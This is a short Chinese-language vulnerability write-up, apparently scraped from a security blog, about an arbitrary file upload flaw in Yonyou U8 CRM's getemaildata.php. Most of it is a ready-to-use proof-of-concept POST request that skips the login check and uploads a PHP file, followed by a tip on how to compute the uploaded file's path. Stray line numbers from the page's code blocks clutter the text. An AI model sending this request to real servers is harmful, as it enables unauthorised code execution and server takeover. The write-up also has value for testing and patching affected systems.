# 用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
# 漏洞描述
用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器
# 漏洞影响
# 网络测绘
# 漏洞复现
登陆页面
验证POC
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ
------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain
<?php phpinfo();?>
------WebKitFormBoundarykS5RKgl8t3nwInMQ
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
文件名需要十六进制减一
/tmpfile/updD24D.tmp.php
1